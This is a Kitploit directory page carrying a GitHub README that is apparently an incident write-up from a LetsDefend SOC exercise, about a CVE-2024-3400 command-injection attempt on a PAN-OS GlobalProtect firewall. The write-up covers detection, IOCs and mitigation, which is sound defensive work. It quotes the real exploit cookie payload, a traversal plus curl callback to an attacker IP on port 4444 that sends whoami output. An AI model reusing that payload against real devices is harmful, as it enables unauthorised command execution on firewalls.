Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
letsdefend-cve2024-3400-case-study — 针对 Palo Alto PAN-OS GlobalProtect 门户的 CVE-2024-3400 漏洞利用尝试的检测、分析与响应策略。包含 IOC、漏洞利用模式及缓解指南。 | Kitploit
工具/GitHubGitHub/cyprianatsyor/letsdefend-cve2024-3400-case-study
危害指标 (IOC) 管理漏洞分析漏洞利用Web应用程序漏洞利用取证分析数字取证命令与控制威胁情报学习与教育

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
事件响应
日志分析
GitHubcyprianatsyor/letsdefend-cve2024-3400-case-study

letsdefend-cve2024-3400-case-study

针对 Palo Alto PAN-OS GlobalProtect 门户的 CVE-2024-3400 漏洞利用尝试的检测、分析与响应策略。包含 IOC、漏洞利用模式及缓解指南。

查看仓库
1年前尚未审核

letsdefend-cve2024-3400-case-study

针对 Palo Alto PAN-OS GlobalProtect 门户的 CVE-2024-3400 利用尝试的检测、分析与响应策略。包含 IOC、利用模式及缓解指南。

CVE-2024-3400 事件调查

🔍 概述

本仓库包含对 CVE-2024-3400 的详细调查与威胁分析。CVE-2024-3400 是一个影响 Palo Alto Networks PAN-OS 软件、专门针对 GlobalProtect 门户的严重未授权命令注入漏洞。

2024 年 4 月 18 日,在一台内部 PAN-OS 防火墙上检测到针对易受攻击的 /global-protect/login.esp 端点的利用活动。攻击者使用一个经过精心构造的 SESSID cookie,其中包含通过反引号执行的 curl 命令,以访问托管在 144.172.79.92(佛罗里达州迈阿密)的远程 C2 服务器。该利用载荷利用 ${IFS} 绕过简单的过滤器,并利用 PAN-OS 的遥测目录来暂存恶意活动。防火墙返回 200 OK,表明该载荷很可能已成功执行。

事件概览

📄 事件摘要

  • 事件 ID:249

  • 检测规则:SOC274 – PAN-OS 命令注入利用

  • 事件时间:2024 年 4 月 18 日 03:09 UTC

  • 主机名:PA-Firewall-01

  • 目标 IP:172.16.17.139

  • 源 IP:144.172.79.92

  • 请求方法:POST

  • 端点:/global-protect/login.esp

  • Cookie 载荷:SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)

  • 恶意哈希:

  • SHA256:3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

  • MD5:0c1554888ce9ed0da1583dbdf7b31651

  • 恶意脚本:update.py(使用 执行)

🧠 威胁情报

威胁情报

第 1 步:通过在 malpedia 上搜索进行初步利用检测

调查步骤 1

第 2 步:分析并调查该哈希

调查步骤 2

第 3 步:另一项调查

调查步骤 3

第 4 步:IP 地址调查

调查步骤 4

🧠 行为指标

  • 滥用 SESSID 进行命令注入
  • 使用 ${IFS} 进行规避
  • 在 /opt/panlogs/tmp/device_telemetry 中暂存载荷
  • 利用后涉及 dt_send 进程
  • 向攻击者 IP 的 4444 端口发起网络回调

📄 日志证据

日志样本


🧩 哈希关联

哈希匹配


✅ 在 LetsDefend 获得的积分

关键积分

🚨 影响

  • 在核心安全设备上实现远程未授权命令执行
  • 可能下载并执行攻击者控制的 Python 载荷
  • 滥用 PAN-OS 内部遥测机制进行暂存或数据外泄
  • 放行了来自已知恶意 IP 的流量

✅ 建议的响应措施

  1. 修补 PAN-OS 至以下版本:10.2.9-h1、11.0.4-h1 或 11.1.2-h3
  2. 阻止恶意 IP:144.172.79.92
  3. 在日志和文件系统中搜索失陷指标 (IOC)
  4. 检查遥测目录中是否存在可疑文件或执行行为
  5. 隔离受影响的系统并执行完整的取证分析

📁 目录内容

  • logs/:解析后的及原始检测日志
  • ioc/:与攻击相关的文件哈希和 IP
  • analysis/:深入分析利用行为与进程追踪
  • report/:我的调查日志和代码的摘要与图像

什么是 CVE-2024-3400

CVE-2024-3400 是指 Palo Alto Networks PAN-OS 中的一个严重漏洞,专门影响 GlobalProtect 网关。以下是关于该漏洞的公开已知信息梳理:

🔥 CVE-2024-3400 – Palo Alto PAN-OS 命令注入漏洞

CVSS 评分:10.0(严重)

发布时间:2024 年 4 月

受影响产品:启用 GlobalProtect 时的 PAN-OS 10.2、11.0 和 11.1。

利用情况:已在野外得到确认(零日漏洞)

漏洞类型:未授权命令注入

🧠 风险是什么?

CVE-2024-3400 允许未授权攻击者在防火墙操作系统上执行任意命令。这实际上使攻击者无需凭据即可完全控制受影响的设备——对于任何依赖 Palo Alto 防火墙的企业来说,这都是一个严重的突破口。

⚠️ 利用所需条件:

必须启用 GlobalProtect 网关。

特定的 PAN-OS 版本(10.2.x、11.0.x、11.1.x)。

如果未处于额外的安全防护层之后,可通过互联网利用。

🔎 攻击者在做什么:

发送特制请求以利用注入缺陷。

部署远程 shell 或下载第二阶段载荷。

已观察到的行为包括:

通过特制 URL 执行命令

持久化机制

网络内部的横向移动

🛡️ 缓解措施与建议:

立即修补:Palo Alto 已发布修复程序;请升级到不受影响的版本(例如 10.2.9-h1、11.0.4-h1、11.1.2-h3 或更高版本)。

检查失陷指标 (IOC),例如可疑进程、出站连接或异常的 CLI 历史记录。

使用 Shodan 或资产清单等工具来查找易受攻击的设备。

🛠️ 如何进行调查(例如通过 LetsDefend 或 SIEM):

查找未经过有效身份验证就访问 GlobalProtect 的外部 IP。

检查日志中是否存在可疑的命令执行(show system processes、cat /etc/passwd 等)。

监控防火墙行为,并对异常的出站连接发出告警。

本仓库既可作为内部调查报告,也可作为防御者了解 PAN-OS 漏洞真实世界利用情况的教育资源。欢迎贡献和补充观察。

下载工具
/usr/bin/python3